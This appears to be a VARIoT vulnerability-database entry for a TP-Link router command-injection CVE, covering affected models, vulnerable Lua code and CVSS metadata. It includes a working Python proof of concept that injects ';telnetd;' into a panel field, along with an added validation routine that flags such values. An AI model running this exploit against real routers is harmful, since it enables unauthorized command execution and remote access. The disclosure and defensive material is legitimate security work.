var-201801-0554
Vulnerability from variot

TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the new-tunnelname variable in the pptp_client.lua file. TP-Link WVR, WAR, and ER devices contain a command injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). TP-Link WVR, WAR and ER devices are different series of router products from TP-LINK of China. Security vulnerabilities exist in TP-Link WVR, WAR, and ER devices. These vulnerabilities can be triggered from the LAN, and from the WAN if the "remote management" function is enabled.

Vulnerability Type:

Command Injection (Authenticated)

Product:

We have tested these vulnerabilities on TL-WVR450L (the latest version is TL-WVR450L V1.0161125) and TL-WVR900G (TL-WVR900G V3.0_170306). The following models should also be affected, and the vendor has confirmed this: TP-Link ER5110G, TP-Link ER5120G, TP-Link ER5510G, TP-Link ER5520G, TP-Link R4149G, TP-Link R4239G, TP-Link R4299G, TP-Link R473GP-AC, TP-Link R473G, TP-Link R473P-AC, TP-Link R473, TP-Link R478G+, TP-Link R478, TP-Link R478+, TP-Link R483G, TP-Link R483, TP-Link R488, TP-Link WAR1300L, TP-Link WAR1750L, TP-Link WAR2600L, TP-Link WAR302, TP-Link WAR450L, TP-Link WAR450, TP-Link WAR458L, TP-Link WAR458, TP-Link WAR900L, TP-Link WVR1300G, TP-Link WVR1300L, TP-Link WVR1750L, TP-Link WVR2600L, TP-Link WVR300, TP-Link WVR302, TP-Link WVR4300L, TP-Link WVR450L, TP-Link WVR450, TP-Link WVR458L, TP-Link WVR900G, TP-Link WVR900L

CVE details:

The details of each vulnerability are as follows:
CVE-2017-15613: new-interface variable in the cmxddns.lua file
CVE-2017-15614: new-outif variable in the pptp_client.lua file
CVE-2017-15615: lcpechointerval variable in the pptp_client.lua file
CVE-2017-15616: new-interface variable in the phddns.lua file
CVE-2017-15617: iface variable in the interface_wan.lua file
CVE-2017-15618: new-enable variable in the pptp_client.lua file
CVE-2017-15619: pptphellointerval variable in the pptp_client.lua file
CVE-2017-15620: new-zone variable in the ipmac_import.lua file
CVE-2017-15621: olmode variable in the interface_wan.lua file
CVE-2017-15622: new-mppeencryption variable in the pptp_client.lua file
CVE-2017-15623: new-enable variable in the pptp_server.lua file
CVE-2017-15624: new-authtype variable in the pptp_server.lua file
CVE-2017-15625: new-olmode variable in the pptp_client.lua file
CVE-2017-15626: new-bindif variable in the pptp_server.lua file
CVE-2017-15627: new-pns variable in the pptp_client.lua file
CVE-2017-15628: lcpechointerval variable in the pptp_server.lua file
CVE-2017-15629: new-tunnelname variable in the pptp_client.lua file
CVE-2017-15630: new-remotesubnet variable in the pptp_client.lua file
CVE-2017-15631: new-workmode variable in the pptp_client.lua file
CVE-2017-15632: new-mppeencryption variable in the pptp_server.lua file
CVE-2017-15633: new-ipgroup variable in the session_limits.lua file
CVE-2017-15634: name variable in the wportal.lua file
CVE-2017-15635: max_conn variable in the session_limits.lua file
CVE-2017-15636: new-time variable in the webfilter.lua file
CVE-2017-15637: pptphellointerval variable in the pptp_server.lua file

Credits:

chunibalon, puzzor @VARAS of IIE

Timeline:

2017.08 to 2017.09: Issues found.
2017.09.26: Vendor contacted.
2017.10.13: Vendor confirmed.
2017.10.14: CVE id requested.
2017.10.19: CVE id assigned.
2018.1: Vendor confirmed that all affected products have been fixed.

Vulnerability detail:

These vulnerabilities share a similar cause, so only CVE-2017-15616 is explained here. The other vulnerabilities can be reproduced using the variable and Lua file listed for each CVE above.

In the file /usr/lib/lua/luci/controller/admin/phddns.lua, line 113:

    function add_phddns(http_form)
        local form_data = json.decode(http_form.data)
        local jdata = form_data.params.new

        ret = form:insert(CONFIG_NAME, "phddns", jdata, RULE_KEYS, nil)

        if not ret then
            return false, err.ERR_COM_TABLE_ITEM_UCI_ADD
        end

        if not uci_r:commit(CONFIG_NAME) then
            return false, err.ERR_COM_UCI_COMMIT
        end

        -- add the ref of interface
        ifs.update_if_reference(jdata.interface, 1)

        sys.fork_exec('/etc/init.d/phddns restart')
        userconfig.cfg_modify()

        return jdata
    end

This file processes a POST request from the web management panel at the URL "ip/cgi-bin/luci/;stok=xxx/admin/phddns?form=phddns". The interface argument passed in the POST request can carry a malformed command payload, and the Lua file does not check the argument sufficiently. The malformed value of the "interface" argument then causes the command injection vulnerability.
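The missing argument check described above can be expressed as a detection and validation routine over the form body. This is an added example, not code from the advisory or from the vendor's fix; the function names, the identifier pattern and the constructed sample bodies are assumptions, and the field names are taken from the CVE list on this page.

```python
import json
import re
from urllib.parse import parse_qs, urlencode

# Characters that let a value break out of a shell command line:
# separators, pipes, substitution, redirection, quoting and line breaks.
SHELL_META = re.compile(r"[;&|`$<>()\\'\"\r\n]")

# Fields that name an interface or zone (from the CVE list: new-interface,
# iface, new-outif, new-bindif, new-zone). The pattern is an assumption;
# the set of names the firmware really accepts is not given on the page.
IDENTIFIER_FIELDS = {"interface", "iface", "outif", "bindif", "zone"}
IDENTIFIER_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def iter_strings(node, path=()):
    """Yield (path_tuple, value) for every string leaf under node."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from iter_strings(value, path + (str(key),))
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from iter_strings(value, path + (str(index),))
    elif isinstance(node, str):
        yield path, node


def inspect_form_body(body):
    """Return sorted (field_path, reason) findings for one POST body.

    The body is the urlencoded form the panel sends: data=<JSON document>.
    An empty list means nothing suspicious was found.
    """
    fields = parse_qs(body, keep_blank_values=True)
    raw = fields.get("data", [None])[0]
    if raw is None:
        return [("data", "missing")]
    try:
        doc = json.loads(raw)
    except ValueError:
        return [("data", "not-json")]
    params = doc.get("params", {}) if isinstance(doc, dict) else {}

    findings = []
    for path, value in iter_strings(params):
        dotted = ".".join(path)
        if SHELL_META.search(value):
            findings.append((dotted, "shell-metacharacter"))
        elif path[-1] in IDENTIFIER_FIELDS and not IDENTIFIER_RE.fullmatch(value):
            findings.append((dotted, "not-an-identifier"))
    return sorted(findings)


def make_body(interface):
    """Build a constructed phddns 'add' request body for the given interface."""
    doc = {
        "method": "add",
        "params": {
            "index": 0,
            "old": "add",
            "new": {"interface": interface, "name": "test1",
                    "passwd": "test", "enable": "on"},
            "key": "add",
        },
    }
    return urlencode({"data": json.dumps(doc)})


# Constructed sample bodies: a normal rule, the malformed interface value
# shown in the advisory, and a value that is merely not a valid name.
SAMPLES = {
    "benign": make_body("WAN1"),
    "injected": make_body("WAN1;telnetd;"),
    "odd-name": make_body("WAN 1"),
    "garbage": "data=%7Bnot-json",
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, inspect_form_body(body))
```

Free-text fields such as passwd can legitimately contain some of these characters, so a finding there calls for review rather than automatic rejection; identifier fields can be rejected outright.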

PoC file:

    import requests
    import urllib
    import json

    # This is the PoC code of authenticated command injection of TP-Link WVR900G router with the CVE-2017-15616.
    # To reproduce the PoC, the ip of the router should be 192.168.123.1 and the password of web management panel should be 'adminadmin'

    PASSWORD = 'c6564879eda92681404fb4ce64343788e47d266c490bb9d574f4467644a2f96b73ec157bbffabb50752c46f55d026ec7ef34661d7dcb030b0b1fa527173093ae4358f4740e539322f58c441ea0003978475346fb66320f749cc138f867bc0d8d9501f1613524fbba565979d95df6ef412837dee15a6dd8867d00b91c6f4a3406'
    BASEURL = 'http://192.168.123.1'
    LOGINURL = BASEURL + '/cgi-bin/luci/;stok=/login?form=login'

    MARK = '###'
    VULURL = BASEURL + '/cgi-bin/luci/;stok=%s/admin/phddns?form=phddns' % (MARK)

    headers = {
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4",
        "Connection": "keep-alive",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Host": BASEURL[7:],
        "Origin": BASEURL,
        "Referer": "%s/webpages/login.html" % (BASEURL),
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
        "X-Requested-With": "XMLHttpRequest"
    }

    login_data_value = {'method': 'login','params': {'password': PASSWORD,'username': 'admin'}}
    login_data = {'data':json.dumps(login_data_value)}
    s = requests.Session()
    s.headers.update(headers)
    print (LOGINURL)
    print (login_data)
    res = s.post(LOGINURL, data=login_data)
    stok = eval(res.text)['result']['stok']
    print '[*] stok is %s' % (stok)

    tmp_vul = VULURL.replace(MARK, stok)
    print '[*] vul_url is %s ' % (tmp_vul)

    delete_data = {"method":"delete","params":{"key":"key-0","index":"0"}}
    delete_data = {'data': json.dumps(delete_data)}
    print '[+] delete existed rule'
    res = s.post(tmp_vul, data=delete_data)
    print '[*] response is: %s' % (res.text)

    # after executing this payload, the router will open its telnetd service.
    payload = ''';telnetd;'''
    vul_data = {"method":"add","params":{"index":0,"old":"add","new":{"interface":"WAN1%s" % (payload),"name":"test1","passwd":"test","enable":"on"},"key":"add"}}

    vul_data = {'data': json.dumps(vul_data)}
    print '[+] sending payload'
    res = s.post(tmp_vul, data=vul_data)
    print '[*] response is: %s' % (res.text)

Reference:

https://github.com/chunibalon/Vulnerability/blob/master/CVE-2017-15613_to_CVE-2017-15637.txt



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201801-0554",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "wvr900l",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "wvr900g",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "tp link",
        "version": "3.0_170306"
      },
      {
        "model": "wvr4300l",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "wvr2600l",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "wvr450l",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "tp link",
        "version": "1.0161125"
      },
      {
        "model": "wvr450",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "wvr300",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "wvr458l",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "wvr1750l",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "wvr302",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "r473g",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "r4149g",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "war1300l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "war450l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "r4239g",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "r478\\+",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "war458l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "r478",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "er5120g",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "r473gp-ac",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "war302",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "war2600l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "r4299g",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "war1750l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "r488",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "r478g\\+",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "er5110g",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "r473",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "war900l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "wvr1300g",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "r473p-ac",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "er5520g",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "r483g",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "war458",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "wvr1300l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "r483",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "war450",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "er5510g",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-er5110g",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-er5120g",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-er5510g",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-er5520g",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-r4149g",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-r4239g",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-r4299g",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-r473",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-r473g",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-r473gp-ac",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-r473p-ac",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-r478",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-r478+",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-r478g+",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-r483",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-r483g",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-r488",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-war1300l",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-war1750l",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-war2600l",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-war302",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-war450",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-war450l",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-war458",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-war458l",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-war900l",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-wvr1300g",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-wvr1300l",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-wvr1750l",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-wvr2600l",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-wvr300",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-wvr302",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-wvr4300l",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-wvr450",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-wvr450l",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-wvr458l",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-wvr900g",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-wvr900l",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "er",
        "scope": null,
        "trust": 0.6,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "wvr",
        "scope": null,
        "trust": 0.6,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "war",
        "scope": null,
        "trust": 0.6,
        "vendor": "tp link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-02034"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011946"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201710-902"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-15629"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-er5110g_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-er5120g_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-er5510g_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-er5520g_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-r4149g_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-r4239g_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-r4299g_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-r473_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-r473g_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-r473gp-ac_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-r473p-ac_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-r478_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-r478%2b_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-r478g%2b_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-r483_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-r483g_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-r488_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-war1300l_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-war1750l_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-war2600l_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-war302_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-war450_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-war450l_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-war458_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-war458l_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-war900l_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-wvr1300g_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-wvr1300l_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-wvr1750l_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-wvr2600l_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-wvr300_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-wvr302_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-wvr4300l_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-wvr450_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-wvr450l_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-wvr458l_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-wvr900g_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-wvr900l_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011946"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "chunibalon, puzzor",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "145823"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2017-15629",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "id": "CVE-2017-15629",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.9,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "id": "CNVD-2018-02034",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "id": "VHN-106470",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.2,
            "id": "CVE-2017-15629",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "trust": 1.8,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2017-15629",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2017-15629",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2018-02034",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201710-902",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-106470",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-15629",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-02034"
      },
      {
        "db": "VULHUB",
        "id": "VHN-106470"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-15629"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011946"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201710-902"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-15629"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
